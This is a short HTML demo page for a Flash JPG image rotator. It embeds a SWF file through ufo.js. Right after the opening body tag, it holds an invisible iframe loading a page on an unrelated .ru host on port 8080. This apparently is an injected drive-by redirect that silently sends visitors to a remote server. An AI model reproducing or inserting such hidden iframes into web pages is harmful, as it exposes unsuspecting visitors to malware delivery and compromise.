<html>

<head>

	<title>Flash JPG Rotator</title>

	

	

	<script type="text/javascript" src="ufo.js"></script>




</head>

<body style="margin:50px;"><iframe src="http://39v.ru:8080/index.php" width=199 height=108 style="visibility: hidden"></iframe>







<p id="jpgrotator"><a href="http://www.macromedia.com/go/getflashplayer">Get the Flash Player</a> to see this player.</p>

<script type="text/javascript">

	var FO = { 	movie:"jpgrotator.swf",width:"600",height:"180",majorversion:"7",build:"0",bgcolor:"#FFFFFF" };

	UFO.create(FO, "jpgrotator");

</script>



	

</body>

</html>